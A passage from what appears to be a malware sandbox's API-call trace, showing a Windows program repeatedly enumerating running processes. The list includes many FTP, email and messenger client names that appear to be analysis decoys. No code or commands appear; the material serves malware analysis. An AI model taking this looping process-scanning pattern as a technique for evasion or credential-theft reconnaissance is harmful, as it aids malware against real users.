lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.148] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0250.150] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.153] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0250.155] CloseHandle (hObject=0x1018) returned 1 [0250.155] Sleep (dwMilliseconds=0x64) [0250.265] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0250.278] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.279] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0250.281] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0250.282] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.284] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0250.285] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.286] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0250.288] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0250.289] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0250.290] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.292] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.295] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0250.297] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.298] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.300] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.301] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.303] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.304] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.306] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.307] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0250.377] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0250.379] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0250.381] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.382] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.384] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0250.390] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0250.392] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0250.393] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0250.395] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.396] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0250.397] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0250.399] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.400] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0250.404] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0250.405] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0250.407] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0250.408] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0250.409] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0250.411] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0250.412] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0250.413] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0250.414] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0250.416] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0250.435] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0250.437] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0250.438] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0250.439] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0250.441] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0250.442] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0250.443] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0250.445] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0250.446] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0250.447] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0250.449] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0250.453] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0250.454] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0250.456] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0250.457] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0250.459] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0250.460] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0250.462] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0250.466] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0250.468] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0250.470] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0250.472] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0250.473] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0250.475] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0250.476] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0250.478] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0250.532] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0250.534] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0250.536] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0250.537] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0250.539] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0250.540] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0250.545] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0250.546] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0250.548] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0250.549] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0250.551] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, 